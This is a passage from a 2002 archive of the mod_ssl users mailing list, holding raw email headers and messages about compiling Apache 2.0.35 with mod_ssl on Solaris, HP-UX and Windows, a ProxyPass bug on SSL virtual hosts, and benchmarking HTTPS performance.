us.


------=_NextPart_000_0005_01C1EDC5.B4A5F5C0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 27 12:57:54 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA21907; Sat, 27 Apr 2002 12:56:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA21840; Sat, 27 Apr 2002 12:55:26 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C21B84CE620; Sat, 27 Apr 2002 12:55:24 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3RAZdJ33540; Sat, 27 Apr 2002 12:35:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from slb-smtpout-01.boeing.com id QAA11009; Fri, 26 Apr 2002 16:28:58 +0200 (MET DST)
Received: from stl-av-02.boeing.com ([192.76.190.7])
	by slb-smtpout-01.boeing.com (8.9.2/8.8.5-M2) with ESMTP id HAA05443
	for ; Fri, 26 Apr 2002 07:29:03 -0700 (PDT)
Received: from blv-hub-01.boeing.com (localhost [127.0.0.1])
	by stl-av-02.boeing.com (8.9.3/8.9.2/MBS-AV-01) with ESMTP id JAA05166
	for ; Fri, 26 Apr 2002 09:28:55 -0500 (CDT)
Received: from cruciate.ca.boeing.com (cruciate.ca.boeing.com [130.42.133.41])
	by blv-hub-01.boeing.com (8.11.3/8.11.3/MBS-LDAP-01) with ESMTP id g3QETKh05621
	for ; Fri, 26 Apr 2002 07:29:20 -0700 (PDT)
Received: from localhost (dodge@localhost)
	by cruciate.ca.boeing.com (8.9.3+Sun/8.9.3) with ESMTP id HAA06524
	for ; Fri, 26 Apr 2002 07:28:48 -0700 (PDT)
Date: Fri, 26 Apr 2002 07:28:47 -0700 (PDT)
From: "John P. Dodge" 
X-X-Sender: dodge@cruciate
To: modssl-users@modssl.org
Subject: Re: 2.0.35 and mod_ssl hangs
In-Reply-To: <3CC91394.8B494E38@bourse.ch>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by opensource.ee.ethz.ch id QAA11020
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John P. Dodge" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I did not encrypt the key, so I don't use a passphrase.

I forgot some specifics:

solaris 2.8
gcc 2.95.3
openssl 0.9.6c  (./config no-idea shared threads -fPIC)


					Thanks...

On Fri, 26 Apr 2002, Owen Boyle wrote:

> "John P. Dodge" wrote:
> >
> > I just compiled 2.0.35 with:
> >
> > ./configure \
> >         --prefix=/opt/apache_2.0.35.ssl \
> >         --with-layout=Apache \
> >         --without-confadjust \
> >         --without-execstrip \
> >         --with-mpm=worker \
> >         --enable-ssl \
> >         --with-ssl=/opt/ssl
> >
> > But when I try to start Apache it just hangs forever waiting for
> > something:
>
> Like the passphrase you used when you encrypted your certificate?
>
> You need either a script to feed it or  remove it altogether:
>
> http://www.modssl.org/docs/2.8/ssl_faq.html#ToC31
>
> Rgds,
>
> OWen Boyle.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

----------------------------------------
"Mon aéroglisseur est plein d'anguilles"
John P. Dodge
Boeing Shared Services
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 27 12:57:59 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA21910; Sat, 27 Apr 2002 12:56:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA21842; Sat, 27 Apr 2002 12:55:26 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E4FA44CE742; Sat, 27 Apr 2002 12:55:24 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3RAZpN33552; Sat, 27 Apr 2002 12:35:51 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id QAA12362; Fri, 26 Apr 2002 16:52:11 +0200 (MET DST)
Date: Fri, 26 Apr 2002 16:52:11 +0200 (MET DST)
Message-Id: <200204261452.QAA12362@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] mod_ssl on HP-UX 11.00 (PR#699)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Luca Fasolo
Version: httpd-2.0.35
OS: HP-UX 
Submission from: (NULL) (212.141.20.125)


Compiling Apache 2.0.35 with these configuration options:

# cat config2035Luca
CC=cc CFLAGS="-O2 +DD32" ./configure     \
            --enable-mods-shared=all  \
            --enable-ssl              \
            --disable-auth-digest

I've:
        /bin/sh /home/updates/httpd-2.0.35/srclib/apr/libtool --silent
--mode=compile cc  -Ae +DAportable +Z -DNO_DBM_REWRITEMAP  -O2 +DD32  -DHPUX11
-D_REENTRANT -D_XOPEN_SOURCE_EXTENDED    -I.
-I/home/updates/httpd-2.0.35/os/unix
-I/home/updates/httpd-2.0.35/server/mpm/prefork
-I/home/updates/httpd-2.0.35/modules/http
-I/home/updates/httpd-2.0.35/modules/proxy -I/home/updates/httpd-2.0.35/include
-I/home/updates/httpd-2.0.35/srclib/apr/include
-I/home/updates/httpd-2.0.35/srclib/apr-util/include
-I/usr/local/ssl/include/openssl -I/usr/local/ssl/include
-I/home/updates/httpd-2.0.35/modules/dav/main
-I/home/updates/httpd-2.0.35/srclib/apr-util/include
-I/home/updates/httpd-2.0.35/srclib/apr-util/xml/expat/lib  -c ssl_expr_scan.c
&& touch ssl_expr_scan.slo
cc: warning 441: Previous '+DA' or '+DD' option overridden by '+DD32' option.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 116: error
1588: "ssl_expr_yylval" undefined.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 116: error
1529: Cannot select field of non-structure.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 117: error
1588: "T_STRING" undefined.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 169: error
1588: "ssl_expr_yylval" undefined.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 169: error
1529: Cannot select field of non-structure.
[...]
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 226: error
1588: "T_DIGIT" undefined.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 233: error
1588: "ssl_expr_yylval" undefined.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 233: error
1529: Cannot select field of non-structure.
cc: "/home/updates/httpd-2.0.35/modules/ssl/ssl_expr_scan.l", line 234: error
1588: "T_ID" undefined.
*** Error exit code 1

Stop.


I've used "+DD32" because it was necessary to 
successfully compile and install openssl-0.9.6c; without it,
the result is the same. I have to use cc
because with gcc (64bit) I wasn't able to build neither 
openssl nor mod_ssl for apache 1.3.23.

Do you have some suggestions? 
My machine is
# uname -a
HP-UX a500 B.11.00 U 9000/800 1517720548 unlimited-user license

Apache 1.3.23 with mod_ssl is now up and running, I can compile
Apache 2.0.35 without mod_ssl.

Thanks in advance for your help.
--Luca
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 27 13:18:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA24213; Sat, 27 Apr 2002 13:17:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from RUTSKER.buyex.dk id NAA24174; Sat, 27 Apr 2002 13:16:13 +0200 (MET DST)
Received: from [192.168.1.112] ([213.237.69.177]) by RUTSKER.buyex.dk with Microsoft SMTPSVC(5.0.2195.4453);
	 Sat, 27 Apr 2002 13:16:25 +0200
Date: Sat, 27 Apr 2002 13:15:15 +0200
From: Guan Yang 
To: modssl-users@modssl.org
Subject: mod_ssl, Apache 2.0.35 and ProxyPass
Message-ID: <3641926.1019913315@[192.168.1.112]>
X-Mailer: Mulberry/2.2.0 (Win32)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-OriginalArrivalTime: 27 Apr 2002 11:16:25.0770 (UTC) FILETIME=[F85088A0:01C1EDDC]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guan Yang 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am using Apache 2.0.35 (configured using --enable-ssl 
--enable-proxy) and I am having some problems with using ProxyPass 
over an SSL-encrypted server.

For example, here are the relevant lines from ssl.conf:




#  General setup for the virtual host
DocumentRoot "/var/apache2/htdocs"
ProxyPass /hello http://unicast.org/
ServerName npcomplete.unicast.org:443
ServerAdmin you@your.address
.
.
.


(nothing else has been changed)

https://unicast.org/ works fine (you can test it), but when I try to 
access https://unicast.org/hello/ it doesn't work. The browser simply 
times out.

Can anyone help me?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 27 13:52:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA25550; Sat, 27 Apr 2002 13:51:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id NAA25532; Sat, 27 Apr 2002 13:50:46 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id 12929BD2C; Sat, 27 Apr 2002 13:51:21 +0200 (CEST)
Date: Sat, 27 Apr 2002 13:51:21 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl problem
Message-ID: <20020427115120.GA7901@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <000801c1ed2f$d7d8ccc0$0201a8c0@manjeet>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <000801c1ed2f$d7d8ccc0$0201a8c0@manjeet>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Apr 26, 2002 at 08:06:54PM +0530, manjeet wrote:
> Dear Sir,
> 
> PLease tell me solution about mod_ssl
> 
> Starting service httpd[Fri Apr 26 22:16:27 2002] [info] mod_ssl:Compat: MAPPED 'SSLEnable' => 'SSLEngine on'
> 
> [Fri Apr 26 22:44:59 2002] [notice] Apache/1.3.12 (Unix)  (SuSE/Linux) mod_fastcgi/2.2.2 DAV/0.9.14 mod_perl/1.21 PHP/4.0b4pl1 mod_ssl/2.6.2 OpenSSL/0.9.5 configured -- resuming normal operations
> 
> 
What exactly is the problem - all this tells me is that you've got
an old version of Apache and mod_ssl - and that you're either using a
very old config or a config from something like Apache+SSL

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 27 13:55:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA25730; Sat, 27 Apr 2002 13:54:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id NAA25657; Sat, 27 Apr 2002 13:53:07 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id 67E60BD2C; Sat, 27 Apr 2002 13:53:47 +0200 (CEST)
Date: Sat, 27 Apr 2002 13:53:47 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl, Apache 2.0.35 and ProxyPass
Message-ID: <20020427115347.GB7901@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3641926.1019913315@[192.168.1.112]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3641926.1019913315@[192.168.1.112]>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, Apr 27, 2002 at 01:15:15PM +0200, Guan Yang wrote:
> I am using Apache 2.0.35 (configured using --enable-ssl 
> --enable-proxy) and I am having some problems with using ProxyPass 
> over an SSL-encrypted server.
> 
ProxyPass is broken for ssl vhosts in Apache 2.0.35 - either use
the latest cvs version (where this bug has been fixed) or wait 
for the next Apache2 release.

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr 28 03:04:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA09691; Sun, 28 Apr 2002 03:03:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA09683; Sun, 28 Apr 2002 03:02:35 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A04544CE694; Sun, 28 Apr 2002 03:02:33 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3RH3wR39243; Sat, 27 Apr 2002 19:03:58 +0200 (CEST)
Date: Sat, 27 Apr 2002 19:03:58 +0200 (CEST)
Message-Id: <200204271703.g3RH3wR39243@en1.engelschall.com>
To: modssl-users@modssl.org
From: "Ralf S. Engelschall" 
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
X-Type: auto-reply
Subject: Re: A  new website [auto-reply]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Your Email concerning
  "A  new website" 
was successfully received by me today  and filed into my personal mail
folder for consideration.  But because I'm chronically busy due to the
large  amount of  requests directed  to my  person from  free software
projects I'm involved in, I certainly cannot immediately reply to you.

So, if you need immediately support for...
  o OpenPKG  then send to openpkg-bugdb@openpkg.org
  o OSSP     then send to ossp-bugdb@ossp.org
  o OpenSSL  then send to openssl-users@openssl.org
  o mod_ssl  then send to modssl-users@modssl.org
  o Apache   then post to comp.infosystems.www.servers.unix
  o GNU Pth  then send to pth-users@gnu.org
  o WML      then send to sw-wml@engelschall.com
  o ePerl    then send to sw-eperl@engelschall.com

If you  have problems with other  free software packages I  wrote (MM,
GNU  shtool,  gFONT, iSelect,  LCWA,  NLP,  Slice, SMTPclient,  SMake,
etc.), please first try to  solve your problems by investigating again
and by  utilizing other  support resources (documentation,  FAQ, other
users, etc).

Otherwise please  wait for my  reply if you  expect one. But  be aware
that because of the constant high  volume traffic to my Email address,
support related questions might be  rejected if the question cannot be
answered in a reasonable short time.

Thanks for your understanding.

Yours,
                                       Ralf S. Engelschall    
                                       rse@engelschall.com
                                       www.engelschall.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 29 13:02:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA06118; Mon, 29 Apr 2002 13:01:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id NAA06080; Mon, 29 Apr 2002 13:00:51 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 29 Apr 2002 03:59:45 -0700
Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP;
	Mon, 29 Apr 2002 10:59:45 GMT
X-Originating-IP: [134.32.101.94]
From: "paul priestman" 
To: modssl-users@modssl.org
Subject: Performance issues - testing
Date: Mon, 29 Apr 2002 10:59:45 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 29 Apr 2002 10:59:45.0610 (UTC) FILETIME=[F8FFBAA0:01C1EF6C]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "paul priestman" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hello all,

I am having worries about the performance of using mod_ssl.  Can anyone 
suggest any good testing package that will give me hits per second when 
running on a https server and hits per second when running on a normal http 
server so i can compare the performance. I am using apache 1.3.22 with mod 
ssl.

Thanks for your time

Paul


_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 29 16:59:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA22937; Mon, 29 Apr 2002 16:58:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from server.cartmanager.net id QAA22911; Mon, 29 Apr 2002 16:58:03 +0200 (MET DST)
Received: from Jason (dhcp120.cartmanager.net [207.173.85.120])
	by server.cartmanager.net (8.11.6/8.11.6) with ESMTP id g3TEnqk20270
	for ; Mon, 29 Apr 2002 08:49:55 -0600
Message-ID: <02d701c1ef8e$42182e40$7855adcf@Jason>
From: "Jason" 
To: 
References: 
Subject: Re: Performance issues - testing
Date: Mon, 29 Apr 2002 08:56:17 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

use 
ab - Apache HTTP server benchmarking tool

I believe it comes with apache.....
man ab
for more info

----- Original Message ----- 
From: "paul priestman" 
To: 
Sent: Monday, April 29, 2002 4:59 AM
Subject: Performance issues - testing


> 
> Hello all,
> 
> I am having worries about the performance of using mod_ssl.  Can anyone 
> suggest any good testing package that will give me hits per second when 
> running on a https server and hits per second when running on a normal http 
> server so i can compare the performance. I am using apache 1.3.22 with mod 
> ssl.
> 
> Thanks for your time
> 
> Paul
> 
> 
> _________________________________________________________________
> MSN Photos is the easiest way to share and print your photos: 
> http://photos.msn.com/support/worldwide.aspx
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 29 18:21:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA29188; Mon, 29 Apr 2002 18:21:00 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id SAA28648; Mon, 29 Apr 2002 18:18:25 +0200 (MET DST)
Received: from kursa ([62.189.189.145])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id RAA31109
	for ; Mon, 29 Apr 2002 17:18:21 +0100
From: "Jeff" 
To: 
Subject: SSL handshake error document?
Date: Mon, 29 Apr 2002 17:17:41 +0100
Message-ID: <000501c1ef99$7ae41fd0$3264a8c0@kursa>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a website that requires valid client certificates.

Is there a directive that lets me specify an Error Document if the SSL
connection cannot be formed because the client does not have a valid
digital cert?

PS I did read the FAQ and User Documents, apologies if it's there and I
missed it!

Thanks in advance
Jeff



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 29 19:07:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA02686; Mon, 29 Apr 2002 19:06:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA02677; Mon, 29 Apr 2002 19:06:03 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 82B274CE7C6; Mon, 29 Apr 2002 19:06:02 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3TDfLv98006; Mon, 29 Apr 2002 15:41:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail1.servstream.com id MAA05212; Mon, 29 Apr 2002 12:47:34 +0200 (MET DST)
Received: from xev.servstream.com ([193.41.1.65])
	by mail1.servstream.com (8.11.6/8.11.6) with SMTP id g3TAlXr12770
	for ; Mon, 29 Apr 2002 11:47:33 +0100
Date: Mon, 29 Apr 2002 11:43:01 +0100
From: Patrick Herborn 
To: modssl-users@modssl.org
Subject: Re: mod_ssl, Apache 2.0.35 and ProxyPass
Message-Id: <20020429114301.0d442896.patrick.herborn@bbc.co.uk>
In-Reply-To: <20020427115347.GB7901@marvin-lnx.int.tele.dk>
References: <3641926.1019913315@[192.168.1.112]>
	<20020427115347.GB7901@marvin-lnx.int.tele.dk>
Organization: BBC Technology Limited
X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Herborn 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 27 Apr 2002 13:53:47 +0200
Mads Toftum  wrote:

> On Sat, Apr 27, 2002 at 01:15:15PM +0200, Guan Yang wrote:
> > I am using Apache 2.0.35 (configured using --enable-ssl 
> > --enable-proxy) and I am having some problems with using ProxyPass 
> > over an SSL-encrypted server.
> > 
> ProxyPass is broken for ssl vhosts in Apache 2.0.35 - either use
> the latest cvs version (where this bug has been fixed) or wait 
> for the next Apache2 release.

It has been broken for a while, I posted the problem on the list a while back,
but at the time noone had a solution. If you inspect the ssl engine logfiles
you'll see that it is treating the back end server as an SSL client, which is
incorrect. Guess I'll have to give the CVS version a try... having to use
Apache 2 *AND* Apache 1.3 on the same box to deal with http and https is
annoying.

Cheers,

Pat.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 29 20:47:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA09232; Mon, 29 Apr 2002 20:43:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA09136; Mon, 29 Apr 2002 20:42:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 765394CE831; Mon, 29 Apr 2002 20:42:02 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3TIaYn02909; Mon, 29 Apr 2002 20:36:34 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.lawyersonline.co.uk id QAA19531; Mon, 29 Apr 2002 16:10:12 +0200 (MET DST)
Received: from elan-technologies.com (pc1.law700004.adsl.entanet.co.uk [195.74.122.18])
	by mail.lawyersonline.co.uk (8.9.3/8.9.1) with ESMTP id PAA18323
	for ; Mon, 29 Apr 2002 15:10:10 +0100 (BST)
	(envelope-from ross.illingworth@elan-technologies.com)
Posted-Date: Mon, 29 Apr 2002 15:10:10 +0100 (BST)
Received: from stevewin2000 (stevewin2000.local [192.168.35.103])
	by elan-technologies.com (8.9.3/linuxconf) with SMTP id PAA03643
	for ; Mon, 29 Apr 2002 15:09:56 +0100
X-Authentication-Warning: elan-technologies.com: Host stevewin2000.local [192.168.35.103] claimed to be stevewin2000
Message-ID: <000a01c1ef88$c401d650$6723a8c0@stevewin2000>
From: "ross" 
To: 
Subject: win2000 compile
Date: Mon, 29 Apr 2002 15:18:42 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0007_01C1EF91.25AF5AF0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "ross" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C1EF91.25AF5AF0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

hi,

I am trying to compile apache 2 with mod_ssl on win2000.(visual c++ 6)
(I'm not a c++ developer, java is much more my thing.)

I have compiled openssl successfully and installed cygwin.

but when trying to compile apache2 I get the following errors from =
mod_ssl.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--------------------Configuration: mod_ssl - Win32 =
Release--------------------
Generating ssl_expr_parse.c/.h from ssl_expr_parse.y
/usr/local/share/bison.simple: No such file or directory
bison: The system cannot find the file specified.
Could Not Find =
C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\modules\ssl\y.tab.c
The system cannot find the file specified.
Could Not Find =
C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\modules\ssl\y.tab.h
Error executing c:\winnt\system32\cmd.exe.
mod_ssl.so - 1 error(s), 0 warning(s)
--------------------Configuration: abs - Win32 =
Release--------------------
Compiling...
ab.c
C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\support\ab.c(164) : =
fatal error C1083: Cannot open include file: 'open
ssl/rsa.h': No such file or directory
Error executing cl.exe.
abs.exe - 1 error(s), 0 warning(s)
NMAKE : fatal error U1077: 'msdev' : return code '0x2'
Stop.
Error executing NMAKE.

Apache.exe - 4 error(s), 4 warning(s)
NMAKE : fatal error U1077: 'msdev' : return code '0x4'
Stop.
NMAKE : fatal error U1077: '"C:\Program Files\Microsoft Visual =
Studio\VC98\bin\NMAKE.EXE"' : return code '0x2'
Stop.
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Does anyone have a suggestion as to how i can get round this.
The 'y.tab.c' and 'y.tab.h' files seem to be generated by sed, but the =
cygwin version doesn't seem to be being used.(i think :-} )

thanks

Ross

------=_NextPart_000_0007_01C1EF91.25AF5AF0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









hi,


 


I am trying to compile apache 2 with =
mod_ssl on=20
win2000.(visual c++ 6)


(I'm not a c++ developer, java is much =
more my=20
thing.)


 


I have compiled openssl successfully =
and=20
installed cygwin.


 


but when trying to compile apache2 I =
get the=20
following errors from mod_ssl.


 


>>>>>>>>>>>>>>>>=
>>>>>>>>>>>>>>>>>>&=
gt;>>>>>>>>>>>>>>>

--------------------Configuration: =
